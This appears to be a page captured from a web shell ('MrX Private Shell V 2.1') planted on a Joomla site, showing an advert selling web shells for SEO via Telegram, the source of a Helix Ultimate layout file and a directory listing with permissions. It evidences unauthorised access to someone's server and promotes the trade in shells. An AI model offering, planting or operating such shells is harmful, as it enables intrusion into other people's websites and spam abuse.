__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package Helix_Ultimate_Framework * @author JoomShaper <[email protected]> * @copyright Copyright (c) 2010 - 2021 JoomShaper * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later */ defined('_JEXEC') or die(); use Joomla\CMS\Layout\FileLayout; $layout_path_carea = JPATH_ROOT .'/plugins/system/helixultimate/layouts'; $layout_path_module = JPATH_ROOT .'/plugins/system/helixultimate/layouts'; $data = $displayData; $section_sematic = $data['sematic']; extract($displayData); ?> <div class="row"> <?php foreach ($rowColumns as $key => $column) { if (isset($componentArea) && $componentArea) { $column->sematic = 'aside'; } else { $column->sematic = 'div'; } $column->hasFeature = $loadFeature; $column->section_sematic = $section_sematic; if ($column->settings->column_type) { echo (new FileLayout('frontend.conponentarea', $layout_path_carea))->render($column); } else { echo (new FileLayout('frontend.modules', $layout_path_module))->render($column); } } ?> </div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| headerlist | Folder | 0775 |
|
|
| conponentarea.php | File | 973 B | 0664 |
|
| generate.php | File | 1.1 KB | 0664 |
|
| modules.php | File | 2.26 KB | 0664 |
|
| rows.php | File | 1.05 KB | 0664 |
|